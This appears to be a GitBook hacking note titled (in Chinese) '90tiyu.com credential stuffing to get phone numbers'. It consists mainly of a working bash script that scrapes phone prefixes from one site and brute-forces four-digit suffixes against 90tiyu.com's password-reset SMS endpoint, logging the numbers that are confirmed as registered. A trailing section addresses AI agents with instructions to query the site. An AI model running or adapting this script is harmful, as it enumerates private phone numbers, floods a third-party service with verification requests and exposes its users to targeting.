# 90tiyu.com 撞库出电话

![https://t.me/HackerNiao/35753](/files/DhltaOwD6bnDImCEyOdp)

```bash
#!/bin/bash
lynx -dump "http://so.qqdna.com/" | grep php | awk '{print $2}' | parallel -j 30 -k lynx -dump {} | grep mobile | awk '{print $2}' | sed "s/............................//" > phone
for p in `cat phone | sed "s/.html//"`;do
	for n in `echo $p | awk -F'_' '{print $2}'`;do
		for a in {0..9}{0..9}{0..9}{0..9};do 
			echo "$n$a 撞库中..."
			curl -s "http://www.90tiyu.com/library/utility/json.ashx?act=getpwdsendphoneverify&phone=$n$a" | jq | grep 操作成功 
			if [ $? = 0 ];then echo "`date "+%Y-%m-%d %H:%M:%S"` $n$a" ;else echo "`date "+%Y-%m-%d %H:%M:%S"` $n$a" >> zk撞库.txt; fi
		done
	done >> `echo "$p" | awk -F'_' '{print $1}'`撞库操作成功.txt
done
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://xn--6o0a585a.gitbook.io/devops/jin-jie-ji-shu/90tiyu.com-zhuang-ku-chu-dian-hua.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
